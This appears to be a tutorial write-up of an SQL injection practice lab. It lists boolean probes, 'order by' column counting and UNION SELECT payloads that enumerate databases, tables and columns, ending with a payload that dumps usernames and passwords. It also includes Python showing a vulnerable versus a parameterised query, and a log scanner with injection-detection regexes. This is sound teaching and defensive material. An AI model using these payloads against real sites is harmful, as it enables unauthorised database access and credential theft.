Sql injection experiment one
A classic of youth will never be redeemed immediately
I am not afraid of being stupid, I am afraid that those who are stupid will work harder than me
On a practice target, start by looking for a page that takes a parameter; that is where the injection point will be.
First, test whether the parameter is injectable.
The payloads are as follows:
// Numeric test
?id=1 and 1=1
?id=1 and 1=2
// String test
?id=1' and '1'='1
?id=1' and '1'='2
This target uses the numeric test.
With and 1=1 the page renders normally,
and with and 1=2 it does not.
That shows the parameter is an injection point.
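To show why the two probes above behave differently, here is an added example (not code from the post or its target) that builds a small SQLite table and runs both a lookup that concatenates the raw id value into the SQL text and one that binds it as a parameter. SQLite stands in for MySQL and the table contents are constructed; the page-normal / page-abnormal contrast in the post corresponds to the row counts returned here.

```python
import sqlite3

# Constructed sample rows standing in for the target's table (not from the post).
SAMPLE_ROWS = [(1, "alice"), (2, "bob"), (3, "carol")]


def make_db():
    """In-memory SQLite database with one small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, id_param):
    """The bug: the raw ?id= value is pasted into the SQL text, so
    '1 and 1=2' becomes part of the WHERE clause."""
    sql = f"SELECT id, username FROM users WHERE id={id_param}"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_param):
    """The fix: reject non-numeric ids, then bind the value as a parameter.
    The driver never parses the value as SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    sql = "SELECT id, username FROM users WHERE id=?"
    return conn.execute(sql, (id_value,)).fetchall()


def run_numeric_probe(lookup):
    """Send the post's three requests through a lookup function and report
    whether the and 1=1 / and 1=2 pair behaves like an injection point."""
    conn = make_db()
    try:
        normal = len(lookup(conn, "1"))
        true_probe = len(lookup(conn, "1 and 1=1"))
        false_probe = len(lookup(conn, "1 and 1=2"))
    finally:
        conn.close()
    # Injectable when the true condition leaves the result unchanged
    # and the false condition changes it.
    injectable = normal == true_probe and true_probe != false_probe
    return {
        "normal": normal,
        "true_probe": true_probe,
        "false_probe": false_probe,
        "injectable": injectable,
    }


if __name__ == "__main__":
    print("concatenated:", run_numeric_probe(lookup_vulnerable))
    print("parameterised:", run_numeric_probe(lookup_safe))
```

With the concatenated query the true probe returns the same row as the plain request and the false probe returns nothing, which is exactly the normal/abnormal difference the post relies on. With the parameterised query both probes return nothing, because the value is treated as data, so the probe no longer distinguishes anything.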
After finding the injection point, the next step is to determine the number of fields (columns) the query returns.
For that we use
order by <number>
This is guesswork: try a number, watch whether the page still renders, and adjust. I usually start at 1 and go by feel.
Here I found it is less than 16, i.e. 1-15.
With the column count known, the next goal is the database name. Before that, find out which of the columns are echoed to the front end, using a union query:
union select <the columns found above>
The columns that show up on the front end are the ones to replace with the following queries:
• database() returns the name of the database the current site uses
• user() returns the database user running the current query
• version() returns the current database version
• @@version_compile_os returns the current operating system
• @@datadir returns the current database data directory
The current database is cms
In some challenges the flag is in a different database, so we also need the names of the other databases:
group_concat(schema_name) from information_schema.schemata
Then list the tables of the current database:
group_concat(table_name) from information_schema.tables where table_schema='cms'
Now enumerate the columns;
here the table is guessed to be cms_users:
group_concat(column_name) from information_schema.columns where table_name='cms_user'
The last step is to dump the contents.
Of course, you can also query a single table.
Summary
order by --+ determine the number of columns
union select --+ union query to gather information
id=1' and 1=2 UNION SELECT 1,2,database() --+ query the current database
id=1' and 1=2 UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata --+ list all databases
id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ list table names
id=1' and 1=2 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ list column names
id=1' and 1=2 UNION SELECT 1,2,group_concat(id,username,password) from users --+ dump column values
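Every step in the summary leaves a recognisable trace in the web server's access log. The following added example (my code, not from the post) scans a few constructed common-log-format lines for the patterns used above: the and 1=1 / 1=2 probe, order by <number>, union select, references to information_schema, and the --+ comment terminator. The log lines, hostnames and paths are made up; the query string is URL-decoded first, because the payloads usually arrive as %20 / + encoded requests.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines in common log format (not from the post).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=1%20and%201=2 HTTP/1.1" 200 301
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?id=1+order+by+16--+ HTTP/1.1" 500 88
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /news.php?id=1%27%20and%201=2%20UNION%20SELECT%201,2,group_concat(table_name)%20from%20information_schema.tables--+ HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 2048
"""

# One regex per technique from the post's summary, applied to the decoded query.
SIGNATURES = {
    "boolean_probe": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "order_by": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    # '--+' decodes to '-- ' (dash dash space), which is what MySQL needs.
    "comment_terminator": re.compile(r"(--\s|#|/\*)"),
}

# Pulls the request target out of the quoted "GET /path?query HTTP/1.1" field.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_query(url):
    """Return the query string with both %XX escapes and '+' decoded."""
    return unquote_plus(urlsplit(url).query)


def scan_log(text):
    """Return [(line_number, [matched signature names])] for suspicious requests."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = decode_query(m.group(1))
        matched = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
        if matched:
            hits.append((lineno, matched))
    return hits


if __name__ == "__main__":
    for lineno, names in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(names)}")
```

The benign search for "union station" on the last line is not flagged, because the union signature requires a following select; the boolean probe on line 2 is caught even though it carries no other keyword, which is the stage at which this activity is cheapest to notice. Signatures like these are a starting point for alerting, not a substitute for the parameterised queries that remove the injection point itself.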
Move forward with weight